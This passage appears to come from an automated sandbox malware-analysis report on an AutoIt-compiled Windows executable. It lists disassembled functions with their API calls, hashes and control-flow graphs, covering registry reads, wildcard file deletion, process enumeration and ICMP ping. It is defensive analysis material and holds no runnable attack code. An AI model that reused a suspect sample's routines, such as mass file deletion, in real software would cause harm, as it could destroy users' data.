                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcslen
                                                                                                                                                                                                                                                                                        • String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
                                                                                                                                                                                                                                                                                        • API String ID: 683915450-2030392706
                                                                                                                                                                                                                                                                                        • Opcode ID: 7f393eaae142798e7cc194d00a9acdb826a55acb68560dd9cf24e6012cefb4ac
                                                                                                                                                                                                                                                                                        • Instruction ID: 91e2726aa5e1bb47c69e1c573edfec58f330107f381701b0746d588a3bea5552
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7f393eaae142798e7cc194d00a9acdb826a55acb68560dd9cf24e6012cefb4ac
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9D512771508349AAD711EF709D01D6E7FB9AB95350F04042EF981961E3CB288649F7A3
                                                                                                                                                                                                                                                                                        Function 00F6DC54 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F05851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00F055D1,?,?,00F44B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00F05871
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F6EAB0: GetFileAttributesW.KERNEL32(?,00F6D840), ref: 00F6EAB1
                                                                                                                                                                                                                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00F6DCCB
                                                                                                                                                                                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,?), ref: 00F6DD1B
                                                                                                                                                                                                                                                                                        • FindNextFileW.KERNELBASE(00000000,00000010), ref: 00F6DD2C
                                                                                                                                                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00F6DD43
                                                                                                                                                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00F6DD4C
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                                                                                                                                                                                                                        • String ID: \*.*
                                                                                                                                                                                                                                                                                        • API String ID: 2649000838-1173974218
                                                                                                                                                                                                                                                                                        • Opcode ID: 1b402ef1956cd3c710c20fd915b1bda09214941872c4d56fd784ff6c2d2fd2d7
                                                                                                                                                                                                                                                                                        • Instruction ID: 6e8b4314a50cf062c332fa31c5ad4155d15a0cd26583c10abd9f25855a5431fd
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1b402ef1956cd3c710c20fd915b1bda09214941872c4d56fd784ff6c2d2fd2d7
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: DE314B31409349ABC310EB64CD859AFB7E8AE96310F404A5DF8D5831D1EB25DA09FB66
                                                                                                                                                                                                                                                                                        Function 00F6DD87 Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • CreateToolhelp32Snapshot.KERNEL32 ref: 00F6DDAC
                                                                                                                                                                                                                                                                                        • Process32FirstW.KERNEL32(00000000,?), ref: 00F6DDBA
                                                                                                                                                                                                                                                                                        • Process32NextW.KERNEL32(00000000,?), ref: 00F6DDDA
                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00F6DE87
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 420147892-0
                                                                                                                                                                                                                                                                                        • Opcode ID: 7f6ac570d2021c5f0a1e5f69b6722f2074aef0cd6ec7bad594238bb549ccb590
                                                                                                                                                                                                                                                                                        • Instruction ID: 3a6d95d05c4dd88932d552a806c4494f06de4bab4e0a09f2714e342d79ee3e90
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7f6ac570d2021c5f0a1e5f69b6722f2074aef0cd6ec7bad594238bb549ccb590
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F93182725083019FD310EF64CC85AAFBBE8EF99350F54092DF581871A1DB729945FB92
                                                                                                                                                                                                                                                                                        Function 00F0EE5A Relevance: 21.6, APIs: 14, Instructions: 610windowsleeptimeCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetInputState.USER32 ref: 00F0EF07
                                                                                                                                                                                                                                                                                        • timeGetTime.WINMM ref: 00F0F107
                                                                                                                                                                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F0F228
                                                                                                                                                                                                                                                                                        • TranslateMessage.USER32(?), ref: 00F0F27B
                                                                                                                                                                                                                                                                                        • DispatchMessageW.USER32(?), ref: 00F0F289
                                                                                                                                                                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00F0F29F
                                                                                                                                                                                                                                                                                        • Sleep.KERNEL32(0000000A), ref: 00F0F2B1
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                                                        • API String ID: 2189390790-0
                                                                                                                                                                                                                                                                                        • Opcode ID: cada4ff6c47fabac8f531965992424435ff58d83f4cb474691d39769d84942e9
                                                                                                                                                                                                                                                                                        • Instruction ID: e4bca42e646a9df172c0ed697fc178a16bffcb5d8ac2e5b6ca6733e58fa4d65f
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cada4ff6c47fabac8f531965992424435ff58d83f4cb474691d39769d84942e9
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: AF32E031A08606EFD738CF24C844B6AB7E5BF81315F14852AEA55876D1C775E88CFB82
                                                                                                                                                                                                                                                                                        Function 00F03624 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53windowregistryCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00F03657
                                                                                                                                                                                                                                                                                        • RegisterClassExW.USER32(00000030), ref: 00F03681
                                                                                                                                                                                                                                                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00F03692
                                                                                                                                                                                                                                                                                        • InitCommonControlsEx.COMCTL32(?), ref: 00F036AF
                                                                                                                                                                                                                                                                                        • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00F036BF
                                                                                                                                                                                                                                                                                        • LoadIconW.USER32(000000A9), ref: 00F036D5
                                                                                                                                                                                                                                                                                        • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00F036E4
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                                                                                                                                                                                        • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                                                                                                                                                                                        • API String ID: 2914291525-1005189915
                                                                                                                                                                                                                                                                                        • Opcode ID: ffeeb8851a471d3fb97c4df282cbcaa31267a2664cbb61c76fa473a09fe0011e
                                                                                                                                                                                                                                                                                        • Instruction ID: 297326dcd29d278aa47b3c4c16c6fe9f99a8c56f1f18f4a75b68c590597b1025
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: ffeeb8851a471d3fb97c4df282cbcaa31267a2664cbb61c76fa473a09fe0011e
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F621C3B5D0221CAFDB40DFE4E889A9DBBB5FB18710F10411BF611A62A0D7B54544AF92
                                                                                                                                                                                                                                                                                        Function 00F409DB Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                        control_flow_graph 366 f409db-f40a0b call f407af 369 f40a26-f40a32 call f35594 366->369 370 f40a0d-f40a18 call f2f636 366->370 375 f40a34-f40a49 call f2f636 call f2f649 369->375 376 f40a4b-f40a94 call f4071a 369->376 377 f40a1a-f40a21 call f2f649 370->377 375->377 386 f40a96-f40a9f 376->386 387 f40b01-f40b0a GetFileType 376->387 384 f40cfd-f40d03 377->384 391 f40ad6-f40afc GetLastError call f2f613 386->391 392 f40aa1-f40aa5 386->392 388 f40b53-f40b56 387->388 389 f40b0c-f40b3d GetLastError call f2f613 CloseHandle 387->389 395 f40b5f-f40b65 388->395 396 f40b58-f40b5d 388->396 389->377 405 f40b43-f40b4e call f2f649 389->405 391->377 392->391 397 f40aa7-f40ad4 call f4071a 392->397 400 f40b69-f40bb7 call f354dd 395->400 401 f40b67 395->401 396->400 397->387 397->391 408 f40bc7-f40beb call f404cd 400->408 409 f40bb9-f40bc5 call f4092b 400->409 401->400 405->377 416 f40bed 408->416 417 f40bfe-f40c41 408->417 409->408 415 f40bef-f40bf9 call f38a2e 409->415 415->384 416->415 419 f40c62-f40c70 417->419 420 f40c43-f40c47 417->420 421 f40c76-f40c7a 419->421 422 f40cfb 419->422 420->419 424 f40c49-f40c5d 420->424 421->422 425 f40c7c-f40caf CloseHandle call f4071a 421->425 422->384 424->419 428 f40cb1-f40cdd GetLastError call f2f613 call f356a6 425->428 429 f40ce3-f40cf7 425->429 428->429 429->422
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F4071A: CreateFileW.KERNEL32(00000000,00000000,?,00F40A84,?,?,00000000,?,00F40A84,00000000,0000000C), ref: 00F40737
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00F40AEF
                                                                                                                                                                                                                                                                                        • __dosmaperr.LIBCMT ref: 00F40AF6
                                                                                                                                                                                                                                                                                        • GetFileType.KERNEL32(00000000), ref: 00F40B02
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00F40B0C
                                                                                                                                                                                                                                                                                        • __dosmaperr.LIBCMT ref: 00F40B15
                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00F40B35
                                                                                                                                                                                                                                                                                        • CloseHandle.KERNEL32(?), ref: 00F40C7F
                                                                                                                                                                                                                                                                                        • GetLastError.KERNEL32 ref: 00F40CB1
                                                                                                                                                                                                                                                                                        • __dosmaperr.LIBCMT ref: 00F40CB8
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                                                                                                                                                                        • String ID: H
                                                                                                                                                                                                                                                                                        • API String ID: 4237864984-2852464175
                                                                                                                                                                                                                                                                                        • Opcode ID: 555fea61c713589ae549c0a2d8ee43017745e724be2e145048834fe36fdbd6d3
                                                                                                                                                                                                                                                                                        • Instruction ID: 6677a5986af9092f8f893bc5411811fbff7d90873cf094a717ea888b49ecabc3
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 555fea61c713589ae549c0a2d8ee43017745e724be2e145048834fe36fdbd6d3
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F9A11432A141089FDF19AF78DC92BAE7FA1EB46324F14015AFD11DB391DB399802EB51
                                                                                                                                                                                                                                                                                        Function 00F052A7 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201registryCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F05594: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,?,?,00F44B76,?,?,00000100,00000000,00000000,CMDLINE,?,?,00000001,00000000), ref: 00F055B2
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F05238: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00F0525A
                                                                                                                                                                                                                                                                                        • RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,?,\Include\), ref: 00F053C4
                                                                                                                                                                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00F44BFD
                                                                                                                                                                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00F44C3E
                                                                                                                                                                                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 00F44C80
                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 00F44CE7
                                                                                                                                                                                                                                                                                        • _wcslen.LIBCMT ref: 00F44CF6
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: NameQueryValue_wcslen$CloseFileFullModuleOpenPath
                                                                                                                                                                                                                                                                                        • String ID: Include$Software\AutoIt v3\AutoIt$\$\Include\
                                                                                                                                                                                                                                                                                        • API String ID: 98802146-2727554177
                                                                                                                                                                                                                                                                                        • Opcode ID: 605775ef9189153d8d2179f0758a5c4a68deb1c8a5951e99f70e757dfe85714c
                                                                                                                                                                                                                                                                                        • Instruction ID: 7340cc833e47ee5223ae1ef0a2129b25286a54773dbb7a7337e46ceb3f8ec2cd
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 605775ef9189153d8d2179f0758a5c4a68deb1c8a5951e99f70e757dfe85714c
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9371BD715063059BC700EF69ED819ABBBE9FF88350F90042EF640D31A1DB759A08FB92
                                                                                                                                                                                                                                                                                        Function 00F034D3 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 63windowregistryCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 00F034DE
                                                                                                                                                                                                                                                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 00F034ED
                                                                                                                                                                                                                                                                                        • LoadIconW.USER32(00000063), ref: 00F03503
                                                                                                                                                                                                                                                                                        • LoadIconW.USER32(000000A4), ref: 00F03515
                                                                                                                                                                                                                                                                                        • LoadIconW.USER32(000000A2), ref: 00F03527
                                                                                                                                                                                                                                                                                        • LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00F0353F
                                                                                                                                                                                                                                                                                        • RegisterClassExW.USER32(?), ref: 00F03590
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F03624: GetSysColorBrush.USER32(0000000F), ref: 00F03657
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F03624: RegisterClassExW.USER32(00000030), ref: 00F03681
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F03624: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00F03692
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F03624: InitCommonControlsEx.COMCTL32(?), ref: 00F036AF
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F03624: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00F036BF
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F03624: LoadIconW.USER32(000000A9), ref: 00F036D5
                                                                                                                                                                                                                                                                                          • Part of subcall function 00F03624: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00F036E4
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498675506.0000000000FD5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_16_2_f00000_Centered.jbxd
                                                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                                                        • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                                                                                                                                                                                                                                                        • String ID: #$0$AutoIt v3
                                                                                                                                                                                                                                                                                        • API String ID: 423443420-4155596026
                                                                                                                                                                                                                                                                                        • Opcode ID: 52a09ec58a018752eef30c8fc9a105527a39892bf563425ccc28e81b7d8fbbda
                                                                                                                                                                                                                                                                                        • Instruction ID: 5bbf02e6127a45c31a13a51df3717603080710fd97d0a83d4e053fa5ac21ce8f
                                                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 52a09ec58a018752eef30c8fc9a105527a39892bf563425ccc28e81b7d8fbbda
                                                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6F214C70D0131CABDB519FA5EC45AA9BFB6FB18B50F10011BE604A62A0C7BA0544EFD0
                                                                                                                                                                                                                                                                                        Function 00F80FB8 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON
                                                                                                                                                                                                                                                                                        Download Yara Rule

                                                                                                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                                                                                                        • Not Executed
                                                                                                                                                                                                                                                                                        control_flow_graph 507 f80fb8-f80fef call f0e6a0 510 f8100f-f81021 WSAStartup 507->510 511 f80ff1-f80ffe call f0c98d 507->511 512 f81023-f81031 510->512 513 f81054-f81091 call f1c1f6 call f08ec0 call f1f9d4 inet_addr gethostbyname 510->513 511->510 522 f81000-f8100b call f0c98d 511->522 515 f81033 512->515 516 f81036-f81046 512->516 530 f810a2-f810b0 513->530 531 f81093-f810a0 IcmpCreateFile 513->531 515->516 519 f81048 516->519 520 f8104b-f8104f 516->520 519->520 523 f81249-f81251 520->523 522->510 533 f810b2 530->533 534 f810b5-f810c5 530->534 531->530 532 f810d3-f81100 call f2017b call f0423c 531->532 543 f8112b-f81148 IcmpSendEcho 532->543 544 f81102-f81129 IcmpSendEcho 532->544 533->534 535 f810ca-f810ce 534->535 536 f810c7 534->536 538 f81240-f81244 call f0bd98 535->538 536->535 538->523 545 f8114c-f8114e 543->545 544->545 546 f811ae-f811bc 545->546 547 f81150-f81155 545->547 548 f811be 546->548 549 f811c1-f811c8 546->549 550 f811f8-f8120a call f0e6a0 547->550 551 f8115b-f81160 547->551 548->549 552 f811e4-f811ed 549->552 562 f8120c-f8120e 550->562 563 f81210 550->563 553 f811ca-f811d8 551->553 554 f81162-f81167 551->554 559 f811ef 552->559 560 f811f2-f811f6 552->560 557 f811da 553->557 558 f811dd 553->558 554->546 561 f81169-f8116e 554->561 557->558 558->552 559->560 564 f81212-f81229 IcmpCloseHandle WSACleanup 560->564 565 f81170-f81175 561->565 566 f81193-f811a1 561->566 562->564 563->564 564->538 569 f8122b-f8123d call f2013d call f20184 564->569 565->553 570 f81177-f81185 565->570 567 f811a3 566->567 568 f811a6-f811ac 566->568 567->568 568->552 569->538 571 f8118a-f81191 570->571 572 f81187 570->572 571->552 572->571
                                                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                                                        • WSAStartup.WS2_32(00000101,?), ref: 00F81019
                                                                                                                                                                                                                                                                                        • inet_addr.WSOCK32(?), ref: 00F81079
                                                                                                                                                                                                                                                                                        • gethostbyname.WS2_32(?), ref: 00F81085
                                                                                                                                                                                                                                                                                        • IcmpCreateFile.IPHLPAPI ref: 00F81093
                                                                                                                                                                                                                                                                                        • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00F81123
                                                                                                                                                                                                                                                                                        • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00F81142
                                                                                                                                                                                                                                                                                        • IcmpCloseHandle.IPHLPAPI(?), ref: 00F81216
                                                                                                                                                                                                                                                                                        • WSACleanup.WSOCK32 ref: 00F8121C
                                                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                                                        • Source File: 00000010.00000002.2497785291.0000000000F01000.00000020.00000001.01000000.00000007.sdmp, Offset: 00F00000, based on PE: true
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2497630000.0000000000F00000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000F9D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498185067.0000000000FC3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                        • Associated: 00000010.00000002.2498536511.0000000000FCD000.00000004.00000001.01000000.00000007.sdmpDownload File
